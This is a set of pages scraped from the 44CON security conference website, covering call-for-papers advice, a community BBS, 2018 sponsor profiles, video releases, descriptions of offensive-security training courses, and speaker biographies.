          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first served basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get fewer than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop and your main talk is about the theory, try a play-along walkthrough of how to do it in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          #####EOF##### community – 44CON

          Building A Permanent Community At 44CON

          44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

          To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

          In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

          Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:


          For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.


          Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.


          Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

           

           


          We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

          #####EOF##### 44CON 2018 Sponsors – 44CON

          44CON 2018 Sponsors

          More sponsors will be added as they are confirmed, please check regularly. If you would like to sponsor 44CON 2018, our 44CON 2018 Sponsor Pack provides all the information you will need about sponsoring the conference. If you have any questions, please email Sponsor Ops who will be happy to help.

           

          Gold Sponsors

          BT

          www.bt.com

          With operations in over 180 countries supporting some of the world’s largest companies, nation states and critical national infrastructures, we have a unique perspective on cyber crime. Our front line position means that we see how and where attacks come. We’re constantly watching, learning, predicting and responding to the latest threats to protect our customers and BT.

          We know that a cyber attack can destroy a reputation overnight. We also know that security is the number one digital enabler, allowing a business to run at speed and to build customer trust and investor confidence.

          So we’ve built a team of 2,500 security experts in 14 global centres. It’s the same people who protect our business who also protect yours. This team use unique tools and insight to stay one step ahead of criminal entrepreneurs.

          As a global leader of Managed Security Services, we’re helping customers thrive in a digital world, by delivering world-class security solutions. These are underpinned by our professional services support, cloud of clouds strategy and excellent customer service.

           

          HackerOne

          www.hackerone.com

          The most trusted hacker-powered security platform
          HackerOne was started by hackers and security leaders who are driven by a passion to make the internet safer. Our platform is the industry standard for hacker-powered security. We partner with the global hacker community to surface the most relevant security issues of our customers before they can be exploited by criminals. HackerOne is headquartered in San Francisco with offices in London and the Netherlands. Investors include Benchmark, New Enterprise Associates, Dragoneer Investments, and EQT Ventures.

           

          Tenable

          www.tenable.com

          Tenable®, Inc. is the Cyber Exposure company. Over 24,000 organizations around the globe rely on Tenable to understand and reduce cyber risk. As the creator of Nessus®, Tenable extended its expertise in vulnerabilities to deliver Tenable.io®, the world’s first platform to see and secure any digital asset on any computing platform. Tenable customers include 53 percent of the Fortune 500, 29 percent of the Global 2000 and large government agencies. Learn more at tenable.com.

          NCC Group

          www.nccgroup.trust

          NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape.
           
          With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face.
           
          We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.
           
          Headquartered in Manchester, UK, with over 35 offices across the world, NCC Group employs more than 2,000 people and is a trusted advisor to 15,000 clients worldwide.

          Silver Sponsors

          Microsoft

          www.microsoft.com

          Microsoft (Nasdaq “MSFT”) is the worldwide leader in software, services, and solutions that help people and businesses realise their full potential. Microsoft remains dedicated to software security and privacy and continues to collaborate with the community of people and technology organisations helping to protect customers and the broader ecosystem.

           

          Crowdfense

          www.crowdfense.com

          Crowdfense evaluates, tests and improves state-of-the-art active cyber-defense capabilities from the most talented Researchers in the world and offers them to a carefully selected group of global institutional Customers.

           

          Exhibitors

          Bugcrowd

          www.bugcrowd.com

          Bugcrowd delivers the ultimate in security assessment for the enterprise. The pioneer and innovator in crowdsourced security testing for the enterprise, Bugcrowd combines the power of more than 80,000 security researchers and its proprietary Crowdcontrol™ platform to surface critical software vulnerabilities, and level the cybersecurity playing field. Bugcrowd provides a range of public, private, and on-demand options that allow companies to commission a customized security testing program to fit their specific needs.

          Botprobe

          botprobe.co.uk

          Botprobe Ltd is a University-based, part government funded, state-of-the-art research project tackling big data issues within threat detection. Botprobe has shown to reduce traditional packet capture by up to 97% of data volumes in use in areas such as legal interception, PCAP indexing, pre-incident forensic data capture and improved reaction times to threats. We are developing threat specific IPFIX templates for focused data capture in botnets, spam, ICS malicious behaviour and malicious HTTP requests. We are looking for collaboration, funding and case studies in projects involving threat data when volumes are proving prohibitive in threat analysis.

          Google


          google.com

          Do you like to break things — and then fix them? Does working at massive scale on a stunning array of technologies appeal to you?
          Join Google Security & Privacy Engineering to build secure software solutions that keep Google and its billions of users safe, secure, and happy. Learn more at: g.co/SecurityPrivacyEngJobs

           

          Tigerscheme

          www.tigerscheme.org

          Twitter: @tiger_scheme

          Tigerscheme is a commercial certification scheme for technical security specialists, backed by University standards and covering a wide range of expertise.

          Tigerscheme was founded in 2007, on the principle that a commercial certification scheme run on independent lines would give buyers of security testing services confidence that they were hiring in a recognised and reputable company.

          Tigerscheme provides for career progression through entry level certification, intermediate level certification, and senior and technical specialist roles. Certification under Tigerscheme provides a formal recognition of an individual’s skills, and is awarded on the basis of a rigorous independent assessment against published and widely-accepted standards.

          CheckSec

          www.checksec.com

          Canopy: Make Reporting Great Again!

          Writing reports shouldn’t be hard. But for most of us, it’s a pain and the least fun part of our job. Canopy doesn’t make reporting fun, but it does make it a whole lot easier. 

          Stop by to say hello. Stay for a demo. 

          CheckSec: builders of Canopy and proudly sponsoring 44CON since 2012!

          SuperAwesome

          www.superawesome.tv

          SuperAwesome is the world’s largest kidtech company, pioneering technology which delivers digital media functionality with a ‘zero-data’ design to ensure total safety for kids.
          Our private-by-design technology is used by hundreds of brands and content-owners to safely engage with over 500M kids every month.
          In 2018 SuperAwesome was ranked as the #1 technology growth company in the UK by the Financial Times.

          If you’re interested in joining our mission to make the internet a safer place for kids, take a look at our careers page – we’re hiring in all territories now.

          safepass.me

          safepass.me
          The Human Element is always the weakest link in an organisation’s chain of safety. With safepass.me we help you both achieve and exceed your security goals AND say goodbye to frustrating and complex password policies. Deploying safepass.me will help your security team to sleep at night, reduce the frustration of your users and lower the number of helpdesk tickets related to password resets.

          Cortex Insight

          cortexinsight.com

          Identify. Prioritise. Remediate.

          • Automation – Processes and consolidates pentest, vulnerability reports
          • Move Security Left – Easily integrate security into the application development process at an earlier point
          • Security as a Service – Accessible to the entire project team
          • Risk Reduction – Measure the success in your vulnerability management through risk reduction instead of quantities of fixed issues

          For more information or to request a demo contact: info@cortexinsight.com

          Or come and speak to us at 44CON 2018

          Event Supporters

          Integrity

          www.integrity.pt

          INTEGRITY is an ISO 27001 certified and CREST member company. Our vision is to deliver worldwide innovative Information Security services on Auditing and Consulting where we provide our full expertise on the structuring and delivery of InfoSec value-added services, combining our expertise and our proprietary GRC Technology for a consistent and effective cyber risk reduction process for our clients. Such comprehensive services include persistent Pen-Testing (www.keepitsecure24.com), ISO 27001 (www.27001manager.com) and Third Party risk management (www.infosecrating.com) solutions supported by our GRC Platforms (www.integritygrc.com).

          Community Sponsors

          CREST

          www.crest-approved.org

          CREST is the not-for-profit accreditation and certification body representing the technical information security industry. CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services.

          All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected executive board of experienced security professionals who also promote, develop and support awareness, ethics and standards within the cyber security marketplace.

          Follow us on Twitter: @crestadvocate

          44CON was a community sponsor of the CRESTCon & IISP Congress Conference and Exhibition that took place on 3rd May 2018 at the Royal College of Physicians in London.

          ISSA-UK


          www.issa.org

          Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association specifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

          RawHex

          rawhex.com

          Last year’s 44CON badge was based on the HIDIOT by Raw Hex which teaches microelectronics and programming. This year Raw Hex has designed 44COIN, the world’s first physical virtual cryptocurrency powered by the ROPChain and Proof of Alcohol consensus model. Your 44COIN kit will be in your attendee bag. Take it to the soldering area, build it and join the cryptocurrency revolution!

          OWASP

          www.owasp.org

          The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions.

          Event Partners

          Antipøde

          www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts – Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder – it became quickly apparent after moving to London that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple: to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

           



          First Videos From 44CON 2018 Up

          For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

          First up we have Mike Gianarakis and Shubham Shah’s Catch Me If You Can. Mike and Shubs have been working on ephemeral vulnerabilities for a while, and this is a great run-down of both ephemeral bugs as a class and some of their work in the bug bounty space in general.

          Guy Barnhart-Magen and Ezra Caltum talk about hacking Machine Learning, from bias and algorithms to exploiting Remote Code Execution bugs in ML frameworks.

          Much-loved 44CON regular Saumil Shah recovers from an rm -rf incident to deliver a great talk on advanced ARM Shellcode techniques. Expect constrained shellcode with lots of polyglot tricks along the way.

          Timo and Tomi knock it out of the park with their tale of extreme lockpicking. Over a decade these advanced persistent researchers started pulling hotel locks apart. What they found is hilarious, entertaining and downright disturbing. Truly, the industry’s Penn & Teller, only the smaller one talks!

          Jack Matheson shows us the future of networking, and how SmartNICs can help secure the datacentre of the future. We look forward to talks on hacking and backdooring SmartNIC implementations, but this rare (for 44CON) optimistic talk is one to watch.

          We’ll have more videos from 2018 up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!


          44CON 2018 Training

          All training courses will run between the 10th and 12th September 2018 at the Novotel London West in Hammersmith, just a short distance from the main 44CON venue.

          If you are attending the training, here are some key details for you:

          Novotel London West
          1 Shortlands
          Hammersmith
          London
          W6 8DR

          The Training Reception and Registration desk are on the 2nd floor of the Novotel. We initially had a little trouble finding it ourselves so do ask Hotel Reception if you can’t find your way.

          44CON Crew will be available on the 2nd floor from 8:15AM for Registration on the first day of your training. Coffee and snacks will be available on arrival between 8:30 and 9:00. Training runs from 9:00 to 17:30.

          If you have not received your ticket information via Eventbrite please get in touch at registration@44con.com.

          Presented by Ashfaq Ansari

          This training is the advanced version of the Windows Kernel Exploitation Foundation course. In this course we will use Windows 10 RS2 x64 for all the labs. This course starts with the changes in Windows 10 RS2, Internals, hands-on fuzzing of Windows kernel mode drivers. We will understand Pool Internals in order to groom pool memory from user mode for reliable exploitation of pool based vulnerabilities. We will look into how we can bypass KASLR using kernel pointer leaks. We will do hands-on exploitation using a Data-Only attack, which effectively bypasses SMEP and other exploit mitigations.

          Course Length: 3 days (10th-12th September 2018), Novotel London West

          Presented By: Dominic Chell, MDSec

          The course follows chapters 1-9 of the Mobile Application Hacker’s Handbook, with a strong focus on practical attacks. Over the 2-day training course delivered by the lead author of the book, delegates will learn the tricks and techniques to hack and secure mobile applications on the iOS and Android platforms.

          Course Length: 2 days (11th-12th September 2018), Novotel London West

          Presented By: Irena Damsky

          Security has long ago become more than just malware reverse engineering. To defend your organization, you need to analyze your adversary’s intent, opportunities and capabilities. The tools and skills needed are not only of deep technical nature, but also require one to leverage available intelligence and counterintelligence information and know how to make the most of it.

          To become a good intelligence analyst, you need to acquire a different way of thinking – an analytical mindset, which requires getting acquainted with field proven intelligence techniques and methodologies. These will serve as the basis for doing your daily analysis tasks in a much more productive and sophisticated way.

          In this course, which will include both lectures and hands on training, we will learn how to look beyond the malware itself in order to dig information on the infrastructure and actor behind it. We will understand the adversary’s intents, way of thinking and the risk it poses against our threat model, to develop the best protections and mitigations. We will get familiarized with tools for gaining insight into attacker’s workflow and learn how to integrate those into the organization.

          Course Length: 2 days (11th-12th September 2018), Novotel London West

          Presented by: Marcus Pinto and Aaron Devaney, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days (11th-12th September 2018), Novotel London West

          Presented by: Nikhil Mittal

          Penetration Tests and Red Team operations for secured environments need altered approaches. You cannot afford to touch disk, throw executables and use memory corruption exploits without the risk of being ineffective as a simulated adversary. To enhance offensive tactics and methodologies, PowerShell is the tool of choice.

          PowerShell has changed the way Windows networks are attacked. It is Microsoft’s shell and scripting language available by default in all modern Windows computers. It could interact with .Net, WMI, COM, Windows API, Registry and other computers on a Windows Domain. This makes it imperative for Penetration Testers and Red Teamers to learn PowerShell.

          This training is aimed towards attacking Windows networks using PowerShell and is based on real world penetration tests and Red Team engagements for highly secured environments. The course runs as a penetration test of a secure environment with detailed discussion and use of custom PowerShell scripts in each phase.

           Course Length: 3 days (10th-12th September 2018), Novotel London West

          Presented by: Saumil Shah

          ARM has emerged as the leading architecture in the Internet of Things (IoT) world. The ARM IoT Exploit Laboratory is a 3-day intermediate level class intended for students who want to take their exploit writing skills to the ARM platform. The class covers everything from an introduction to ARM assembly all the way to Return Oriented Programming (ROP) on ARM architectures. Our lab environment features hardware and virtual platforms for exploring exploit writing on ARM based Linux systems and IoT devices.

          The class concludes with an end-to-end “Firmware-To-Shell” hack, where we extract the firmware from a popular SoHo router and an IP Camera, build virtual environments to emulate and debug them, and then build exploits to gain a shell on the actual hardware devices.

           Course Length: 3 days (10th-12th September 2018), Novotel London West

          Book your 44CON 2018 training course now!


          Hacking Enterprises: Exploiting Insecurity

          Presented By: Will Hunt and Owen Shearing

          This is an immersive hands-on course that simulates a full-scale enterprise attack scenario. It allows students to assess the situation at every stage of a complex multi-layered penetration test and teaches them multiple ways to identify, enumerate, exploit and compromise an organisation.

          Students will have access to a cloud-based LAB containing multiple networks, some of which are hidden. The theory and exercise content reflect real-world encounters rather than text book challenges and students will complete a vast number of exercises including everything from OSINT and reconnaissance, to creating and executing phishing campaigns against our in-LAB live bots, all the way through to post-exploitation, lateral movement and C2 exfiltration.

          The 2 day course will take place on the 6th & 7th June 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Performing effective OSINT activities
          • Identifying live hosts and services over IPv4 and IPv6
          • IPv4/IPv6 enumeration and exploitation of targets from unauthenticated/authenticated
            perspectives
          • Cracking hashes from a variety of targets including Linux, Windows, DBs and password vaults
          • Performing effective post exploitation attacks, enumeration and data gathering
          • Creating and executing effective phishing campaigns
          • Performing lateral movement and routing traffic to hidden networks
          • Exploiting application weaknesses over tunnels, routed connections and shells
          • Understanding how Active Directory trusts operate, are structured and can be abused
          • Gaining persistence and exfiltrating data via out of band channels
          • Understanding how defensive monitoring can be used to identify malicious activities

          Course Outline

          Day 1:

          Introductions and LAB Overview

          • Overview of the LAB, subnets, challenges and targets
          • Introduction to infrastructure and application security assessments
          • Introduction to monitoring and alerting using our in-LAB ELK stack

          Leveraging OSINT Activities

          • Data scraping: Certificate transparency logs, forums, social media, Shodan/Zoomeye, Google
            dorks and publicly disclosed data breaches
          • Extracting document metadata

          Enumerating and Targeting IPv4 and IPv6 Hosts

          • IPv4/IPv6 construction and addressing schemes
          • ARP, ICMP, TCP, UDP
          • Identifying local and remote IPv4/IPv6 hosts using tools and manual techniques
          • Port scanning, service enumeration and fingerprinting using nmap and atk6 toolsets
          • Using common tools including dirb, wpscan and Metasploit to target IPv6 hosts
          • Parsing and interpreting scan output

          Exposure to Vulnerability Assessment Toolsets

          • Manual and automated approaches to vulnerability identification
          • Options for infrastructure/web
          • Differences in unauthenticated/authenticated scanning
          • Limitations of vulnerability tools vs manual methods

          Linux Enumeration

          • Enumerating and targeting application servers
          • Identifying and enumerating services including SSH, IMAP, SMTP, HTTP/S
          • Using Metasploit, nmap scripts and public code

          Linux Shells, Post Exploitation and Privilege Escalation (Covered in Days 1 and 2)

          • Exploiting weak file/folder permissions, ownership, SUID, SGID and sudo configurations
          • Hacking non-interactive shells and utilising binary breakouts/GTFOBins
          • Permission misconfigurations
          • Leveraging binary vulnerabilities to escalate privileges
          • Using Metasploit, hydra, ncrack and LinEnum

          P@ssw0rd Cracking (Linux)

          • Shadow file construction, hashing and salting (bcrypt, SHAx, MD5)
          • Online/offline attack differences, limitations and tool options
          • Keyspace, attack types and pros/cons of each
          • Utilising hashcat

          Windows Enumeration

          • Targeting SMB/LDAP for user enumeration
          • Explaining differences in data enumerated from unauthenticated/authenticated perspectives
          • User enumeration using recent Sensepost research (2018), built-in toolsets and nmap scripting

          Phishing

          • Phishing campaign infrastructure (domains, SMTP, landing pages)
          • Campaign creation and execution against in-LAB live bots
          • Payload options and attacker motives
          • Gaining access to OWA mailboxes and target hosts on different networks

          Day 2:

          Windows Shells, Post Exploitation and Privilege Escalation

          • Authenticated local/network enumeration
          • Local privilege escalation techniques
          • Kerberoasting
          • AMSI considerations and recent bypasses
          • Leveraging PowerView, Metasploit, Unicorn, SharpSploit and GhostPack
          • Extracting LAPS passwords
          • Domain Pass-the-Hash (PtH) and local PtH limitations/workarounds
          • Extracting clear-text passwords, tokens and LSA secrets
          • RDP session hijacking (time dependent)
          • Data exfiltration using PowerShell
          • Leveraging Mimikatz

          P@ssw0rd Cracking (Windows)

          • Local and Active Directory storage
          • LM/NTLM/NTLMv1/v2/cached creds/Kerberos
          • Interactive/non-interactive challenge/response processes
          • Further hashcat usage including rules and mask attacks

          Defensive Monitoring

          • Introduction to Kibana
          • Investigating events e.g. Windows Defender shutdown, process spawning, task execution and
            associated metadata

          Overcoming Restrictions/Policies Within an Active Directory Environment

          • AppLocker policies/configurations, PowerShell enumeration
          • Leveraging publicly disclosed methods/code and tools (GreatSCT)

          Situational Awareness, Lateral Movement and Pivoting

          • Network segmentation, routing and ingress/egress controls
          • Locating, enumerating and targeting hosts on different networks
          • Metasploit routing and Meterpreter port forwarding
          • SOCKS proxies and proxychains
          • SSH tunnelling (Windows and Linux) for inter-network routing
          • Targeting hosts using common tools over tunnels
          • Mapping with Bloodhound

          Application and Database Enumeration and Exploitation

          • Web application enumeration and vulnerability identification over pivots/tunnels
          • Web browser developer tools and BurpSuite
          • Database structures and enumeration
          • SQL 101 and different types of SQL injection
          • Exploiting recent SQL injection vulnerabilities using manual techniques and sqlmap
          • Database password hash cracking

          Abusing domain trusts to compromise the enterprise

          • Understanding Windows domain trusts
          • Enumerating trusted domains using PowerView
          • Leveraging Metasploit and built-in Windows functionality to enumerate target domains
          • Further Mimikatz usage

          Gaining Persistence & Data Exfiltration Over OOB Channels

          • Persistence mechanisms including registry, services, scheduled tasks, ADS
          • Backdooring hosts to establish out-of-band persistent C2 channels out of an organisation

          Target Audience

          This training is suited to a variety of students, including:

          • Penetration Testers
          • Security Professionals
          • IT Support, Administrative and Network Personnel
          • Anyone looking to enter the world of technical security

          Student Requirements

          • Familiarity with Windows and Linux command line syntax
          • A basic understanding of networking concepts

          What to Bring

          • Students will need to bring a laptop to which they have administrative/root access, running
            either Windows, Linux or Mac operating systems
          • Students will need to have access to VNC, SSH and OpenVPN clients on their laptops

          Students will be provided with

          We realise that 2 days is not a lot of time and therefore students are also provided with the following benefits.

          • 14-day extended LAB access after the course finishes
          • Access to a new LAB subnet and CTF style board with challenges to further test your skills
          • 14-day Slack support channel access where our security consultants are available
          • A Raspberry Pi with Kali Linux pre-installed
          • A portable wireless keyboard/mouse
          • A hard copy of the RTFM

          About the Trainers

          Owen Shearing
          Owen (@rebootuser) is a co-founder of in.security Ltd., a specialist cyber security consultancy offering technical and training services based in the UK. He is a CREST CCT level security consultant with a strong background in networking and IT infrastructure and has over a decade of experience in technical security roles. Owen is experienced in delivering on and offsite consultations and security testing, as well as providing technical training to a variety of audiences at bespoke events and various conferences. He runs the blog https://rebootuser.com and keeps projects at https://github.com/rebootuser.

          Will Hunt
          Will Hunt (@Stealthsploit) is a cyber security consultant who has worked in IT security for over 10 years. He co-founded in.security Ltd., a specialist cyber security company delivering high-end consultancy and training services. He has delivered infrastructure and web hacking courses at Black Hat USA and EU, as well as training at other bespoke international events and conferences. Will also assists the UK government in various technical, educational and advisory capacities. Before Will was a security consultant he was an experienced digital forensics consultant and trainer. He runs the blog https://stealthsploit.com.

          Book your 44CON June 2019 training course now!


          44CON 2016 Speakers

          Robert Schifreen

          Robert Schifreen is the founder of SecuritySmart.co.uk, which provides measurable IT security awareness training. He first became known in the security industry in 1985 when he was the first person in the world to be arrested and tried by a jury in connection with computer hacking. His ultimate acquittal in 1987 on all charges, by the House of Lords (the most supreme court at the time), led to the introduction of the Computer Misuse Act 1990.

           

          Daniel Compton

          Daniel Compton works as a principal security consultant at Info-Assure Ltd. He is a certified CREST/CHECK team leader in both Infrastructure and Applications. Daniel has a keen interest in testing networking devices and has released a number of popular pentesting scripts to assist and automate testing in this area. Daniel is the head of security research at Info-Assure and has discovered over 70 security advisories in applications and network security appliances to date.

          Saumil Shah

          Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients worldwide. Saumil is an internationally recognized conference speaker and instructor for over 15 years. He is also the co-developer of the wildly successful “Exploit Laboratory” courses and authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil holds an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time playing Pacman, flying kites, traveling around the world and taking pictures.

          Will Schroeder

          Will Schroeder is a security researcher and red-teamer for Veris Group’s Adaptive Threat Division. He is a co-founder of the Veil-Framework, developed PowerView and PowerUp, is an active developer on the PowerSploit project, and is a co-founder and core developer of the PowerShell post-exploitation agent Empire. He has presented at a number of security conferences on topics spanning AV-evasion, post-exploitation, red teaming, offensive PowerShell, and more.

          Steve Armstrong

          Steve began working in the security arena in 1994 whilst serving in the UK Royal Air Force. He specialised in the technical aspects of IT security from 1997 onward, and before retiring from active duty, he led the RAF’s penetration and TEMPEST testing teams. He founded Logically Secure in 2006 to provide specialist security advice to government departments, defense contractors, the online video gaming industry, and both music and film labels worldwide.

          When not teaching for SANS, Steve provides penetration testing and incident response services for some of the biggest household names in the high street, online gaming and music media. To relax Steve enjoys playing Battlefield and FPS games to loud music.

          Graham Sutherland

          Graham is a pentester, electronics tinkerer, ex-developer, security researcher, reverse engineer, crypto enthusiast, promulgator of useless facts, vehement drunkard, and bacon aficionado. Can often be found scurrying towards a bar. One of his shoes is probably sentient.

          Graham McKay

          Graham leverages his 15 years of information security leadership experience to advise on appropriate security postures and resilience capabilities in line with risk appetite, focusing on business value.

